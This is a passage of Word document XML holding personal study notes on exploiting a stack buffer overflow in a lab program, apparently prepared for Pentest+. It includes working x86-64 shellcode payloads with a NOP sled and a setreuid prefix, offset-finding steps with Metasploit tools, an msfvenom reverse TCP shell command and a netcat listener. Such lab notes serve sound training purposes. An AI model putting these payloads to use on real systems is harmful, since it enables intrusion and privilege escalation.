          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NOP sled + shell code + random chars + memory address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B557616" w14:textId="3F420F7F" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>90 + 40 + 22 + 6 = 158</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64594F5B" w14:textId="430A5B17" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C36727">
        <w:t>run $(python -c "print('\x90'*90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*22 + 'B'*6)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE0954" w14:textId="0BDDE508" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check for NOP sled and shell code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA82804" w14:textId="552C59A4" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>x/100x $rsp-200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177CBB6" w14:textId="456F861A" w:rsidR="00C36727" w:rsidRDefault="00C36727" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>take any address between NOP sled and shellcode and create a payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62786185" w14:textId="293A0E09" w:rsidR="00C36727" w:rsidRDefault="00CC7EF6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC7EF6">
        <w:t>./buffer-overflow $(python -c "print('\x90'*90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*22 + '\x88\xe2\xff\xff\xff\x7f')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0807D4CE" w14:textId="33393687" w:rsidR="00CC7EF6" w:rsidRDefault="00CC7EF6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run inside directory, not gbd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDA8EB" w14:textId="1859CB38" w:rsidR="00CC7EF6" w:rsidRDefault="00CC7EF6" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use pwntools to generate pre</w:t>
      </w:r>
      <w:r w:rsidR="000949BD">
        <w:t>fix to shellcode to run SETREUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D5EF9F" w14:textId="4AA9228E" w:rsidR="000949BD" w:rsidRDefault="000949BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pwn shellcraft -f d amd64.linux.setreuid 1002\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309703F6" w14:textId="544E482E" w:rsidR="000949BD" w:rsidRDefault="000949BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A33E546" w14:textId="05E7F59E" w:rsidR="000949BD" w:rsidRDefault="000949BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000949BD">
        <w:lastRenderedPageBreak/>
        <w:t>len('\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC66001" w14:textId="51697342" w:rsidR="000949BD" w:rsidRDefault="000949BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>get output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577869D" w14:textId="3627EACD" w:rsidR="000949BD" w:rsidRDefault="000949BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>payload now looks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346794EA" w14:textId="05F89E1C" w:rsidR="000949BD" w:rsidRDefault="000949BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NOP sled (90) + setreuid (14) + shellcode (40) + random chars (8) + Memory address (6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD647C1" w14:textId="0657571F" w:rsidR="000949BD" w:rsidRDefault="000949BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="000949BD">
        <w:t>./buffer-overflow $(python -c "print('\x90'*90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*8 + '\x88\xe2\xff\xff\xff\x7f')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB5E68C" w14:textId="2E86E719" w:rsidR="002037A6" w:rsidRDefault="002037A6" w:rsidP="002037A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Pentest+ Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C783C" w14:textId="10BF338C" w:rsidR="002037A6" w:rsidRDefault="002037A6" w:rsidP="002037A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When targeting vulnerable code (ex. overflow.c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12292980" w14:textId="5D705956" w:rsidR="002037A6" w:rsidRDefault="0009109B" w:rsidP="0009109B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Target lacks canary stack protection, DEP, and address space layout randomization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2016E1" w14:textId="3C36C029" w:rsidR="0009109B" w:rsidRDefault="0009109B" w:rsidP="0009109B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To verify the stack address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76B37F" w14:textId="046AFC59" w:rsidR="0009109B" w:rsidRDefault="0009109B" w:rsidP="0009109B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check code and see declaration of unassigned long variables with values of 0 and print stack value for variable status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175F89BF" w14:textId="0EF6AFDE" w:rsidR="0009109B" w:rsidRDefault="0009109B" w:rsidP="0009109B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when encountering stackpointer program multiple times, will likely see address is randomized (ASLR) – if disabled, the address will return the same every time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C5A0DB" w14:textId="46B10103" w:rsidR="0009109B" w:rsidRDefault="0009109B" w:rsidP="0009109B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Developing an Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80B146" w14:textId="55899BC0" w:rsidR="0009109B" w:rsidRDefault="002C480B" w:rsidP="0009109B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Detecting max array count (400 for example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2908F7" w14:textId="73E793BC" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>force program to crash by modifying printf command to redirect 500 characters to a text file and read text file into input buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B9AB2" w14:textId="24C14750" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. printf ‘A%.0s’ {1..500} &gt; crash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D98654" w14:textId="79AC4852" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>./overflow &lt; crash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615F5D03" w14:textId="13E5989B" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this will overflow the input buffer and create a segmentation fault in the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1C1BF7" w14:textId="7C355830" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use gdb debugger to fuzz the program and test outcome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258521B3" w14:textId="133B500B" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>debugger will show which memory address created the fault and what register was overwritten, causing memory jumps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657A6DAA" w14:textId="4DAB715A" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Insert of a breakpoint in the overflow() function will cause the program to stop executing when the instruction is reached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45285825" w14:textId="0607D825" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>affords ability to inspect the program state at the time of execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FBAFA5" w14:textId="27D09E63" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RSP and RBP are important registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09590519" w14:textId="471A14AE" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need to use to ID offset and execute malicious payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9826B6" w14:textId="2EBE7252" w:rsidR="002C480B" w:rsidRDefault="002C480B" w:rsidP="002C480B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidR="001A2F04">
        <w:t>$rsp and $rsb within gdb and record addresses for each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3471E7" w14:textId="2A3BDAF9" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view entire RSP stack with x/120x $rsp command within gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C5986" w14:textId="7B4A4E0B" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use nexti to read in all As and reuse previous $rsp to view stack overflowing buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA105DD" w14:textId="4170DC00" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To Start a Malicious Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B4D341" w14:textId="77ACBE89" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>First determine where 500-byte payload is overwriting RBP to cause the jump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39168834" w14:textId="791D3C94" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>msf-pattern_create and msf-pattern_offset can be used for this purpose in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9FC70" w14:textId="4EBD5F6D" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>msf-pattern_create -l 500 &gt; fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5202AACB" w14:textId="2F2479B6" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gbd -f ./overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255DF6C3" w14:textId="03256DE8" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>(gdb) run &lt; fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF60C30" w14:textId="050C2FB0" w:rsidR="001A2F04" w:rsidRDefault="001A2F04" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this will return a segmentation fault and grab address manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E224B" w14:textId="7B847CE6" w:rsidR="001A2F04" w:rsidRDefault="00C538C1" w:rsidP="001A2F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>(gdb) x/120x &lt;address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B86FD4" w14:textId="7B1BB92B" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view hexadecimal values at final position of RBP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719B9BF5" w14:textId="62FBE902" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>convert to ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526CCD6" w14:textId="3D1CD524" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>get Big Endian format and reverse for Little Endian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162998BA" w14:textId="7C462F75" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Determine size of payload by generating the offset using final two RBP positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B979710" w14:textId="23BB5527" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>load ASCII values into Metasploit msf-pattern_offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE82E5" w14:textId="37C993A6" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now with offset and RSP position address recorded, generate shellcode and create new payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B321887" w14:textId="4595B0A2" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>msfvenom -p linux/x64/shell_reverse_tcp LHOST=&lt;&gt; LPORT=&lt;&gt; -b ‘\x00’ -f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA603CE" w14:textId="6174AD0E" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can use python payload_gen.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541FD285" w14:textId="210F60E2" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Open netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660491F2" w14:textId="7CD70659" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nc -lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B90D2" w14:textId="1D0E4757" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Finalize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D38F03" w14:textId="418E4F57" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use gdb for overflow program, run program and redirect new payload into running program as input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B86977F" w14:textId="51E7CC5A" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to be able to exploit buffer overflow outside of debugger, new to ID real position of RSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44976DF7" w14:textId="2739064A" w:rsidR="00C538C1" w:rsidRDefault="00C538C1" w:rsidP="00C538C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">copy original code to a different name </w:t>
      </w:r>
      <w:r w:rsidR="00DE3993">
        <w:t>and add line of code that will print the stack address position prior to reading the function</w:t>
      </w:r>
    </w:p>
